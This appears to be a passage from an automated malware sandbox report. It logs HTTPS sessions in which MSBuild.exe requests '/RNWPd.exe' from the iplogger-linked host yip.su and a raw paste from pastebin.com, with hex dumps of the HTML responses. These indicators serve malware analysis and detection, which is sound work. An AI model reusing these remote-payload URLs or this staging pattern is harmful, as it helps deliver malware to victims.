                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:22:15 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:22:15 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:22:15 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:22:15 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.649762188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:16 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:22:17 UTC899INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.42901611328125
                    expires: Mon, 16 Sep 2024 19:22:16 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:22:17 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HZvD3T3Jyq3069EE8U6iA9%2BE%2BDK4Qcw%2BpEznX4m73aQJefLoaB%2BMaGIcZVM1tYz56Mi79KIT2AYX8ZHOad0NIsFcN9YJ6JtnUbze1XlEcs2a02VSPVwwWOA%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c43396fdc5d32d0-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:22:17 UTC470INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:22:17 UTC1369INData Raw: 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79
                    Data Ascii: er" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta property
                    2024-09-16 19:22:17 UTC1369INData Raw: 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30
                    Data Ascii: olor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0
                    2024-09-16 19:22:17 UTC1369INData Raw: 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b
                    Data Ascii: AgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);
                    2024-09-16 19:22:17 UTC1369INData Raw: 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72
                    Data Ascii: tyle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-r
                    2024-09-16 19:22:17 UTC1369INData Raw: 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64
                    Data Ascii: margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="d
                    2024-09-16 19:22:17 UTC155INData Raw: 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: e.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:22:17 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    34192.168.2.649763104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:21 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:22:22 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:22 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c43398f8f6318ae-EWR
                    2024-09-16 19:22:22 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:22:22 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:22:22 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:22:22 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:22:22 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    35192.168.2.649764188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:22:22 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:22:23 UTC906INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:22:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:22:23 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:22:23 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n2%2FTD3pdS3J1%2F%2B0P9LYLqOM%2BosfH1qjlOm5yThjrnZpTTkd76nJMjdmjuh%2F5k1SzOlxm9lypoPAw7nGZ7lPqOOHPohEMCgkJegfBAo4UnMmQZ%2FpjozVEiLI%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c4339962f6b1927-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:22:23 UTC463INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:22:23 UTC1369INData Raw: 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70
                    Data Ascii: sit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta p
                    2024-09-16 19:22:23 UTC1369INData Raw: 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d
                    Data Ascii: round-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-
